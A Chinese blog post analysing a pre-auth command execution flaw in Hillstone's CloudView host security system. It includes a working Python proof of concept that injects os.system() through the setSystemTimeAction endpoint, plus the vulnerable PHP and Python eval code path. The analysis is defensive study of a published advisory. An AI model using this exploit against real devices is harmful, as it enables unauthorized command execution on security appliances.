山石云鉴主机安全管理系统前台任意命令执行漏洞分析

avatar
作者
猴君
阅读量:0

山石云鉴主机安全管理系统前台任意命令执行

漏洞名称

山石网科云鉴存在前台任意命令执行漏洞

漏洞复现

POC

import requests import urllib3  urllib3.disable_warnings()  base_url = "" ''' HSVD-2023-0008 ''' def setSystemTimeAction(newcsrf,headers):     url =  base_url + "/master/ajaxActions/setSystemTimeAction.php?token_csrf="+newcsrf     proxies = {'https':'http://127.0.0.1:8080'}     x = "param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config')"     req2 = requests.post(url, data=x,headers=headers, verify=False)  ''' HSVD-2023-0005 ''' def getMessageSettingAction(newcsrf,header):     proxies = {'https':'http://127.0.0.1:8080'}     company_uuid = "aaa"     platform_sel = "os.system('id > /opt/var/majorsec/installation/master/runtime/img/config')"     url = base_url + '/master/ajaxActions/getMessageSettingAction.php?token_csrf='+newcsrf+"&company_uuid="+company_uuid+"&platform_sel="+platform_sel     req = requests.get(url, headers=header, verify=False)     print(req.text)   def main():     headers = {"Cookie": "PHPSESSID=emhpeXVhbg;",            "Content-Type":"application/x-www-form-urlencoded; charset=UTF-8"            }     url = base_url + "/master/ajaxActions/getTokenAction.php"     req = requests.post(url, verify=False, headers=headers)     newcsrf = req.text.replace("\n", "")     setSystemTimeAction(newcsrf,headers)     reshell = requests.get(base_url + '/master/img/config',verify=False)     print('---------------------cmd-------------------------')     print(reshell.text)  if __name__ == '__main__':     main()

漏洞分析

根据 poc 可知关键函数为 setSystemTimeAction,关键请求为 base_url + "/master/ajaxActions/setSystemTimeAction.php,post 请求的参数为 param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config')

先分析 setSystemTimeAction.php 文件如何处理 http 请求

master\runtime\ajaxActions\setSystemTimeAction.php

<?php  include "../permission.php"; if(!isPermission('operator')){     echo "F";     return; }else if(!verifyToken()){     echo "F";     return; } include_once "../includeUtils.php"; session_write_close(); $param= $_POST['param']; $param=base64_encode($param); $resp=setSysTime($param); $resp = array("Status"=>$resp['status'], "Result"=>json_decode($resp['body'])); echo json_encode($resp,JSON_UNESCAPED_UNICODE); ?>

第 13、14行,将参数 x base64 编码后传递给 setSysTime 函数

function setSysTime($param){     return handleEmptyResult(postCommand("set-mp-time|".$param)); }

setSysTime 中又调用了 postCommand

function postCommand($parameter){     $ch = curl_init();      curl_setopt($ch, CURLOPT_POST, 1); // POST     curl_setopt($ch, CURLOPT_POSTFIELDS, $parameter); // POST param     curl_setopt($ch, CURLOPT_RETURNTRANSFER,1);      $url = "http://".$GLOBALS['serverNm'].":8000/"; // URL     writeLog('post param is '.$parameter, 2);     writeLog('url is '.$url, 2);     curl_setopt($ch, CURLOPT_URL,$url);      curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);      curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);      $headers = array(         "Content-Length: ".strlen($parameter),         "Content-Type: application/x-www-form-urlencoded"     );      curl_setopt($ch, CURLOPT_HTTPHEADER, $headers);      $result = curl_exec ($ch);  	writeLog('post api returns:'.$result, 2); 	$httpCode = curl_getinfo($ch,CURLINFO_HTTP_CODE); 	writeLog($url.' status:'.$httpCode, 2);     writeLog($url.' get api returns:'.$result, 2);     curl_close ($ch);     return array("status"=>$httpCode, "body"=>$result);  }

postCommand 函数的主要功能是通过 curl 做 http post 请求链接 http://127.0.0.1:8000/

通过netstat -lntp查看监听 8000 端口进程的 pid,得知执行进程的命令

netstat -lntp ......  ps -p 2436 -o pid,ppid,cmd // ---------------------cmd-------------------------   PID  PPID CMD  2436     1 python /opt/var/majorsec/installation/base/runtime/bin/python /opt/var/majorsec/installation/base/scripts/service/yamin/main.py

下面分析 /opt/var/majorsec/installation/base/scripts/service/yamin/main.py 是如何处理 http 请求的

此文件是一个基于 Tornado 框架的 Web 服务程序,它提供了一个接收 POST 请求的接口

介绍 — Tornado 4.3 文档 (tornado-zh.readthedocs.io)

主要处理逻辑 CommandHandler post 如下

class CommandHandler (tornado.web.RequestHandler):     # @gen.coroutine     def post(self):         try:             logging.debug('\n'.join(                 '{0}:{1}'.format(k, v) for (k, v) in self.request.headers.get_all()             ))             logging.debug(self.request.body)              command = self.request.body             ret, msg = routeCommand(command, self)              if ret and ret != "alreadySendToFrontEnd":                 self.write(msg)                 self.finish()             elif not ret:                 logging.error(msg)                 raise Exception(msg)         except Exception as e:             logging.error("CommandHandler Exception: {}".format(e))             raise tornado.web.HTTPError(400)

第 10、11 行将 http body 传递给了 routeCommand 处理

def routeCommand(commandline, handler):     global conf     if not commandline:         return False, "Invalid command"      if len(commandline) > 4096 or len(commandline) < 4:         return False, "Invalid command"      command, args = None, None     try:         l = commandline.split('|', 1)         command, args = l[:2] if len(l) > 1 else (l[0], '')     except Exception as e:         return False, "Cannot parse {}:{}".format(commandline, e)      stage = getStage()     if command not in commands[stage]:         return False, "Invalid command {0} at stage {1}".format(command, stage)     if stage in (2, 3) and not initStore():         return False, "Unavailable service"      conf['server'] = handler     try:         command = command.replace('-', '_')         return eval(command)(args=args.split('|'), conf=conf, store=store)     except Exception as e:         return False, e

routeCommand 功能为分割参数 commandline,将 | 之前的字符串赋值给 command,之后的赋值给 args,然后将 command 字符串中的- 替换为 _,最后通过 eval 执行此字符串

例如 commandline = "set-mp-time|base64_encode($param)",处理后 command = "set_mp_time",args = base64_encode($param)

下面分析 eval 执行的函数 set_mp_time(args) 的功能,位于 installation\base\scripts\service\yamin\set_command.py

def set_mp_time(**kwargs):     args = kwargs['args']      try:         time_config_keys = ["config", "zone", "datetime", "ntp_server_1", "ntp_server_2"]         try:             conf = eval(base64.b64decode(args[0]))             logging.info("get time config request: {}".format(conf))             for config_key in time_config_keys:                 if config_key not in conf:                     raise Exception("not found key: {}".format(config_key))         except Exception as e:             return True, setResult(1, errmsg="unexpected args: {}".format(e))          if not conf["zone"] == "" and not conf["zone"] == get_my_timezone():             logging.info("start to set timezone: {}".format(conf["zone"]))             logging.debug("timedatectl set-timezone {0}".format(conf["zone"]))             sys_command.run_sys_cmd("timedatectl set-timezone {0}".format(conf["zone"]))             php_conf_file = "/opt/etc/php.d/majorsec.ini"             if not os.access(php_conf_file, os.R_OK):                 php_conf_file = "/opt/php/etc/php.d/majorsec.ini"             zone_setting = "date.timezone = {}".format(conf["zone"])             zone_setting = zone_setting.replace('/', '\/')             with open(php_conf_file, 'r') as php_conf:                 php_zone = php_conf.readlines()[0].strip().replace('/', '\/')             logging.debug("sed -i -r 's/{0}/{1}/g' {2}".format(php_zone, zone_setting, php_conf_file))             sys_command.run_sys_cmd("sed -i -r 's/{0}/{1}/g' {2}".format(php_zone, zone_setting, php_conf_file))          if conf["config"] == "local":             if conf['datetime']:                 try:                     date = conf['datetime'].split(" ")[0]                     Time = conf['datetime'].split(" ")[1]                 except Exception:                     raise Exception("parse datetime failed: {}".format(conf["datetime"]))                  logging.debug("timedatectl set-ntp false")                 sys_command.run_sys_cmd("timedatectl set-ntp false")                 logging.debug("stop and disable chronyd service")                 sys_command.run_sys_cmd("systemctl stop chronyd.service")                 sys_command.run_sys_cmd("systemctl disable chronyd.service")                 logging.debug('timedatectl set-time "{0} {1}"'.format(date, Time))                 sys_command.run_sys_cmd('timedatectl set-time "{0} {1}"'.format(date, Time))                 sys_command.run_sys_cmd("clock -w")                 time.sleep(1)         else:             logging.debug("enable and start chronyd service")             sys_command.run_sys_cmd("systemctl enable chronyd.service")             p = ConfigParser.ConfigParser()             p.read(base_ini_path)             all_sections = p.sections()             if 'ntp' not in all_sections:                 p.add_section('ntp')             p.set('ntp', 'server1', conf['ntp_server_1'])             p.set('ntp', 'server2', conf['ntp_server_2'])             p.write(open(base_ini_path, 'w'))             sync_setting_to_chronyd()             sys_command.run_sys_cmd("chronyc -a makestep")         return True, setResult(0, '')      except Exception as e:         sys_command.run_sys_cmd("rm -f /opt/tmp/nginx/.first_config_running")         logging.error("set time config exception: {}".format(e))         return True, setResult(1, errmsg="{}".format(e))

关键代码为第 7 行 conf = eval(base64.b64decode(args[0])),通过 eval 执行了 base64 解码的参数

类似功能的简化代码如下

import os  def set_mp_time(args):     eval(args[0])  cmd = "set_mp_time" args = "os.system('whoami')" eval(cmd)(args = args.split('|'))

其中 args 是由 $param= $_POST['param']; 传递来的,所以 payload 为 param=os.system('whoami > /opt/var/majorsec/installation/master/runtime/img/config') ,由于没有回显,所以要将命令执行结果重定向到可以访问的文件中,最后通过访问 http://url/master/img/config 查看命令结果

参考链接

安全公告-山石网科云鉴存在前台任意命令执行漏洞 - 山石网科 (hillstonenet.com.cn)

POC/山石网科云鉴存在前台任意命令执行漏洞.md at main · wy876/POC (github.com)

相关阅读
  1. 项目推荐:Scribe —— 高效的日志聚合服务器
  2. ctf之双色块
  3. GPU服务器与CPU服务器的不同之处
  4. 探索D3Status:暴雪《暗黑破坏神3》服务器状态的智能守护者
  5. Oracle同一台服务器创建多个数据库
  6. WEB应用服务器 -- Tomcat详解及案例实现
  7. 云服务器与传统服务器的区别是什么?
  8. WEB前端10- Fetch API(同步/异步/跨域处理)
  9. 腾讯云 Nginx 服务器 SSL 证书安装部署(Windows)
  10. Intern LM-入门岛-LESSON1-LINUX基础知识

广告一刻

为您即时展示最新活动产品广告消息,让您随时掌握产品活动新动态!